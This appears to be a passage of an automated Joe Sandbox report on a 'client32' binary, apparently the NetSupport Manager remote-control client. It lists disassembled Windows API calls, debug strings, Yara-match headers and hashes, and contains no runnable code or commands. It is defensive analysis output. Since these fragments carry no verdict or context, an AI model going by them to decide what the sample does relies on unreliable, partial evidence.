                                                                                                                                                                • CloseHandle.KERNEL32(00000000,110B7560,00000001,00000000,?,00000000,?,00000015,00000000), ref: 1103D4B2
                                                                                                                                                                  • Part of subcall function 110B42E0: InitializeCriticalSection.KERNEL32(0000002C,?,?,?,00000000,?,?,?,00000000,11184D46,000000FF), ref: 110B4365
                                                                                                                                                                  • Part of subcall function 110B42E0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,11184D46,000000FF), ref: 110B436F
                                                                                                                                                                  • Part of subcall function 110B42E0: GetVersion.KERNEL32(?,?,?,00000000,?,?,?,00000000,11184D46,000000FF), ref: 110B438A
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,59FD48C0,?,?,00000000,?,00000015,00000000), ref: 1103D51E
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00002000,11126510,?,00000000,?), ref: 1103D53A
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000015,00000000), ref: 1103D541
                                                                                                                                                                • SetEvent.KERNEL32(?,59FD48C0,?,?,00000000,?,00000015,00000000), ref: 1103D581
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateEvent$CloseHandle$CriticalInitializeSectionThreadVersion_malloc_memsetwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1003535115-0
                                                                                                                                                                • Opcode ID: 9154998f9bead89350cc591ba6d82ba6fbed2b1eec8a96acc9dda808deea2a2c
                                                                                                                                                                • Instruction ID: 68e594b7f0b416b65d77d8c09baeebda6847d46efb3c775408e77be4df961281
                                                                                                                                                                • Opcode Fuzzy Hash: 9154998f9bead89350cc591ba6d82ba6fbed2b1eec8a96acc9dda808deea2a2c
                                                                                                                                                                • Instruction Fuzzy Hash: DC418C74D04719AFEB10DFB4C888BAEB7F4FB44719F404529E92A962C0DB75B444CB51
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110CEBA0: EnterCriticalSection.KERNEL32(00000000,00000000,59FD48C0,00000000,00000000,00000000,110CEEC0,?,00000001), ref: 110CEBDA
                                                                                                                                                                  • Part of subcall function 110CEBA0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEC42
                                                                                                                                                                • IsWindow.USER32(?), ref: 110CF5DB
                                                                                                                                                                  • Part of subcall function 110CBE90: GetCurrentThreadId.KERNEL32 ref: 110CBE99
                                                                                                                                                                • RemovePropA.USER32(?), ref: 110CF608
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110CF61C
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110CF626
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110CF630
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1921910413-0
                                                                                                                                                                • Opcode ID: b2cb9210c48ec020780b730079c096d2d0f15fc37eb5c92fb884244d7da54c06
                                                                                                                                                                • Instruction ID: 49f9b284af19ac66117d03b2e5a1d443c85d81a0ae1d984d16ece0102360dfac
                                                                                                                                                                • Opcode Fuzzy Hash: b2cb9210c48ec020780b730079c096d2d0f15fc37eb5c92fb884244d7da54c06
                                                                                                                                                                • Instruction Fuzzy Hash: 7D314BB1E007159BDB20DF69C844B5BFBE8AB58B14F004A6DE862D3790DB75E504CF91
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • %02x, xrefs: 11081350
                                                                                                                                                                • ..\CTL32\DataStream.cpp, xrefs: 1108139E
                                                                                                                                                                • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081387
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                                                                                                • API String ID: 2111968516-476189988
                                                                                                                                                                • Opcode ID: 2e0a70d7f48be011b9f6aa9edf4a09ec59e0beebed33c2f057e62bcad71544d0
                                                                                                                                                                • Instruction ID: f12dac7d373f74f5fe212c0395a9fec3f200c40d2e0a4ddded7d9712e57ff33a
                                                                                                                                                                • Opcode Fuzzy Hash: 2e0a70d7f48be011b9f6aa9edf4a09ec59e0beebed33c2f057e62bcad71544d0
                                                                                                                                                                • Instruction Fuzzy Hash: E621A375A052299FD724CF65DCC4EAEB3F8EF44308F0085AEE45A97640D670AD45CB60
                                                                                                                                                                APIs
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110253E7
                                                                                                                                                                • GetDlgItem.USER32(?,00001399), ref: 11025421
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 1102543A
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 11025444
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025486
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$DispatchItemTranslate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1381171329-0
                                                                                                                                                                • Opcode ID: bebdcbb2c02c8b11af5fb3a0b68c2766af8923a7f1998c3c6d7298e063844038
                                                                                                                                                                • Instruction ID: 26246af105c186e59b646e9f33a047c98996dcd180a805fce9500a05ed718ca0
                                                                                                                                                                • Opcode Fuzzy Hash: bebdcbb2c02c8b11af5fb3a0b68c2766af8923a7f1998c3c6d7298e063844038
                                                                                                                                                                • Instruction Fuzzy Hash: 7B21CF70F0030A67E718DB72C885BABF7F8AB4430DF804429EA2696180FB75A441CB95
                                                                                                                                                                APIs
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023657
                                                                                                                                                                • GetDlgItem.USER32(?,00001399), ref: 11023691
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 110236AA
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 110236B4
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110236F6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$DispatchItemTranslate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1381171329-0
                                                                                                                                                                • Opcode ID: 99f2709280ea8f9ab550b0ea7e65d4d5f08f048117412abd294c30500ebf5fe6
                                                                                                                                                                • Instruction ID: e4fa8043caddc7b5f20a5787ebd9a806815b07058dd3ce68a730809c0d747c41
                                                                                                                                                                • Opcode Fuzzy Hash: 99f2709280ea8f9ab550b0ea7e65d4d5f08f048117412abd294c30500ebf5fe6
                                                                                                                                                                • Instruction Fuzzy Hash: AF218475E0830A5BE728DB71CC89F6BB7FCBB48708F804469EA1696680F774E445CB91
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(0000002C,?,?,00000000,?,11042D0F,?,?,?), ref: 110B348F
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,11042D0F,?,?,?), ref: 110B34AE
                                                                                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 110B34D7
                                                                                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 110B34DD
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,11042D0F,?,?,?), ref: 110B350B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$LeaveMetricsSystem$Enter
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4125181052-0
                                                                                                                                                                • Opcode ID: 6e827b865e112c236f8062b7a01fa85b3c230ff9b8f5b84ba316de4fb96b13dc
                                                                                                                                                                • Instruction ID: 801bd15c3d0154c41976e2eaa61373d34deab0fe063badba9a51cb8e6142ad09
                                                                                                                                                                • Opcode Fuzzy Hash: 6e827b865e112c236f8062b7a01fa85b3c230ff9b8f5b84ba316de4fb96b13dc
                                                                                                                                                                • Instruction Fuzzy Hash: A8115172600608DFD715CF79C8849AAFBE9FF98314B20C66ED51AC7214DB76E806CB90
                                                                                                                                                                APIs
                                                                                                                                                                • SetDlgItemTextA.USER32(?,?,?), ref: 1103745C
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 1103747B
                                                                                                                                                                • EnableWindow.USER32(00000000), ref: 1103747E
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 1103748B
                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 1103748E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • API ID: Item$Window$EnableShowText
                                                                                                                                                                APIs
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
                                                                                                                                                                  • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                                                                                                  • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                                                                                                  • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                                                                                                  • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                                                                                                • TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 11091721
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 1109172B
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • API ID: Message$CriticalSectionSendTranslate$AcceleratorDispatchEnterLeave
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(0000002C,?,?,?,11045FFC,?,00000001), ref: 110B340B
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,11045FFC,?,00000001), ref: 110B342E
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,?,11045FFC,?,00000001), ref: 110B344A
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,11045FFC,?,00000001), ref: 110B3451
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,11045FFC,?,00000001), ref: 110B3467
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                APIs
                                                                                                                                                                • SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000,?,?,?,110F5AA9), ref: 110F34E5
                                                                                                                                                                • ConnectNamedPipe.KERNEL32(00000000,00000000,?,?,110F5AA9), ref: 110F34FA
                                                                                                                                                                • GetLastError.KERNEL32(?,?,110F5AA9), ref: 110F3500
                                                                                                                                                                • Sleep.KERNEL32(00000064,?,?,110F5AA9), ref: 110F350F
                                                                                                                                                                • SetNamedPipeHandleState.KERNEL32(00000000,00000003,00000000,00000000,?,?,110F5AA9), ref: 110F3532
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • API ID: NamedPipe$HandleState$ConnectErrorLastSleep
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$VisibleWindow
                                                                                                                                                                • String ID: %d,%d,%d,%d,%d,%d
                                                                                                                                                                • API String ID: 1671172596-1913222166
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strncpy
                                                                                                                                                                • String ID: Client.
                                                                                                                                                                • API String ID: 2961919466-3668916897
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110196BA
                                                                                                                                                                Strings
                                                                                                                                                                • vector<T> too long, xrefs: 110196B5
                                                                                                                                                                • !"NOT IMPLEMENTED", xrefs: 110196CA
                                                                                                                                                                • ..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp, xrefs: 110196C5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                • String ID: !"NOT IMPLEMENTED"$..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp$vector<T> too long
                                                                                                                                                                • API String ID: 909987262-1355409292
                                                                                                                                                                APIs
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 110415C2
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 110415D0
                                                                                                                                                                Strings
                                                                                                                                                                • Info. Set Volume, Locked %d, Volume %d, Max volume %d, xrefs: 11041522
                                                                                                                                                                • d, xrefs: 110415D8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                • String ID: Info. Set Volume, Locked %d, Volume %d, Max volume %d$d
                                                                                                                                                                • API String ID: 3728558374-2833518301
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1111706E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$DeleteObject
                                                                                                                                                                • String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
                                                                                                                                                                • API String ID: 3011517232-3209293507
                                                                                                                                                                • Opcode ID: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                                                                                                • Instruction ID: 71694b1901628e7c3f0e0f97bec8b89b6520565b9ddb22d4603e25af3e6b7442
                                                                                                                                                                • Opcode Fuzzy Hash: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                                                                                                • Instruction Fuzzy Hash: 62414F75A00F058FD724CF79CD856ABF7E1FF84219F104A3ED56A9A244EB3565418F00
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 11077241
                                                                                                                                                                • CopyRect.USER32(?,00000004), ref: 1107726F
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077229
                                                                                                                                                                • m_hWnd, xrefs: 1107722E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 2755825785-2830328467
                                                                                                                                                                • Opcode ID: 52b039dbae3ac474573174c2f07e54e0dc35dacba2b0f62a005c55ea2bccfa41
                                                                                                                                                                • Instruction ID: de278a2cd4c0b5f0839ddad857aefe36ed68345845b5ae66c69d21e7740d687e
                                                                                                                                                                • Opcode Fuzzy Hash: 52b039dbae3ac474573174c2f07e54e0dc35dacba2b0f62a005c55ea2bccfa41
                                                                                                                                                                • Instruction Fuzzy Hash: 3841A331E00A06DBCB14CE68C9C8A5EF7F1FF84344F10C569E86597644EB30E941CB58
                                                                                                                                                                Strings
                                                                                                                                                                • Exit Win10 Start screen (%s), xrefs: 110314E6
                                                                                                                                                                • Error. WindowsD not generated, xrefs: 11031592
                                                                                                                                                                • Error. ExitMetro code cannot init kbfilter, xrefs: 11031579
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle_memset$ClassCodeCursorExitFromNameObjectOpenPointProcessSingleVersionWaitWindow_strncpywsprintf
                                                                                                                                                                • String ID: Error. ExitMetro code cannot init kbfilter$Error. WindowsD not generated$Exit Win10 Start screen (%s)
                                                                                                                                                                • API String ID: 2171401249-3225996774
                                                                                                                                                                • Opcode ID: 62f961d9fac91cbabdff2b102d703fb8ceba0662e6fd2ba6f82ae67eccb203d8
                                                                                                                                                                • Instruction ID: ccd051d7305efa45e343e075a4b0b177443abffe8ba45bd3bfa9cf8fd8a66105
                                                                                                                                                                • Opcode Fuzzy Hash: 62f961d9fac91cbabdff2b102d703fb8ceba0662e6fd2ba6f82ae67eccb203d8
                                                                                                                                                                • Instruction Fuzzy Hash: 5031E87AE18619DFEB11CFA4AC017ADB7B4DB48A19F0442AADC26536C0EB316904C7D1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1109B671
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1109B686
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$ErrorException@8ExitLastMessageProcessThrow_malloc_memsetstd::exception::exception
                                                                                                                                                                • String ID: ..\CTL32\IEFavourites.cpp$IsA()
                                                                                                                                                                • API String ID: 718578146-3791668299
                                                                                                                                                                • Opcode ID: fc21dcdb6ffeba61cbd6f2c5d28e25d0cd18af64b2fb39d35a095f5ac3d38a21
                                                                                                                                                                • Instruction ID: a25e5e8df4ba3542d3730a7f5bbf6fd392d61f4fcc93709a443f3569d7e07fc3
                                                                                                                                                                • Opcode Fuzzy Hash: fc21dcdb6ffeba61cbd6f2c5d28e25d0cd18af64b2fb39d35a095f5ac3d38a21
                                                                                                                                                                • Instruction Fuzzy Hash: 2231E6B5D0461AABC710CF99DC80B9EFBF8FF18214F80856EE959A7340E7756504CB90
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                • String ID: Stop reconn to %s
                                                                                                                                                                • API String ID: 536389180-2663412807
                                                                                                                                                                • Opcode ID: aae6b297b8c7916bcbe50019fe196bd0f541e6307e3a713ee4deb62ca464ceb8
                                                                                                                                                                • Instruction ID: 8acbe8f22c4af59d4f8e944e94e0264762def9f03065f5921db6513219838372
                                                                                                                                                                • Opcode Fuzzy Hash: aae6b297b8c7916bcbe50019fe196bd0f541e6307e3a713ee4deb62ca464ceb8
                                                                                                                                                                • Instruction Fuzzy Hash: 78318335E002099FDB60CF79C980A6AB7F9FF89314F1046AED45AC7684EB31E944CB50
                                                                                                                                                                APIs
                                                                                                                                                                • _memmove.LIBCMT ref: 110D1128
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                                                                                • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                                                                                                • API String ID: 1528188558-323366856
                                                                                                                                                                • Opcode ID: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                                                                                                • Instruction ID: cd45fd8f54c028a965d30ceca3f2b81ac61ec80aecbdd09916459db7febd3670
                                                                                                                                                                • Opcode Fuzzy Hash: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                                                                                                • Instruction Fuzzy Hash: AE21263EB003476BDB11DE69EC50F9BB7D99FC528CB108498F98887301EE72F4058294
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110ECA90: IsWindow.USER32(0000070B), ref: 110ECA9D
                                                                                                                                                                  • Part of subcall function 110ECA90: SendMessageA.USER32(0000070B,0000045F,0000070B,00000000), ref: 110ECAD4
                                                                                                                                                                  • Part of subcall function 110ECA90: SendMessageA.USER32(0000070B,0000044B,00000000,?), ref: 110ECB06
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110496FE
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 11049705
                                                                                                                                                                  • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CursorFolderMessagePathSend$FileLoadModuleNameWindow
